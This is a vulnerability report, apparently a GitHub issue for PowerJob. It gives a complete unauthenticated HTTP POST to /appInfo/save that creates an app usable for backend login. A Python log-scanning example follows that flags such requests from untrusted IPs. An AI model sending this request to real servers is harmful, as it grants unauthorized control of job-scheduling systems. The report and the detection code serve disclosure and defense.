Describe the bug
A clear and concise description of what the bug is.
Hello team, I want to report an unauthorized access vulnerability.
There is an unauthorized access on the /appInfo/save interface.
Just send this data packet:
POST /appInfo/save HTTP/1.1
Host: test.cn:7700
Content-Length: 36
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69
Content-Type: application/json;charset=UTF-8
Origin: http://test.cn:7700
Referer: http://test.cn:7700/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

{"appName":"test","password":"test"}
It creates an app without requiring any permissions.
The next step is to log in to the backend using the username and password you created.
then
To Reproduce
Steps to reproduce the behavior.
Expected behavior
A clear and concise description of what you expected to happen.
Environment
PowerJob Version: [e.g. 3.0.0]
Java Version: [e.g. OpenJDK 8]
OS: [e.g. CentOS 8.1]
Screenshots
If applicable, add screenshots to help explain your problem.
Additional context
Add any other context about the problem here.
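One way to look for use of the request reported above in access logs, as an added example that is not part of the original report or of the PowerJob code base. It assumes the server sits behind a reverse proxy that writes combined-format access logs; the trusted network range, the function names and the sample log lines are constructed for illustration.

```python
import ipaddress
import re

# Assumption: combined-format access logs from a reverse proxy in front of
# the server. The trusted admin range below is hypothetical.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]
TARGET_PATH = "/appInfo/save"  # endpoint named in the report

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_trusted(ip_text):
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False  # an unparseable source is treated as untrusted
    return any(ip in net for net in TRUSTED_NETS)

def find_untrusted_app_creations(lines):
    """Return (ip, timestamp, status) for POSTs to TARGET_PATH from outside TRUSTED_NETS."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Compare the path only: drop any query string and trailing slash.
        path = m["target"].split("?", 1)[0].rstrip("/")
        if path != TARGET_PATH:
            continue
        if not is_trusted(m["ip"]):
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits

# Constructed sample log lines (not from a real system).
SAMPLE_LOG = [
    '10.1.2.3 - - [01/Mar/2023:10:00:00 +0000] "POST /appInfo/save HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Mar/2023:10:05:12 +0000] "POST /appInfo/save HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Mar/2023:10:05:30 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Mar/2023:11:20:01 +0000] "POST /appInfo/save?x=1 HTTP/1.1" 200 64 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, ts, status in find_untrusted_app_creations(SAMPLE_LOG):
        print(f"untrusted app creation: {ip} at {ts} (HTTP {status})")
```

Each hit is an app registration that should be matched against the list of apps the operators created themselves.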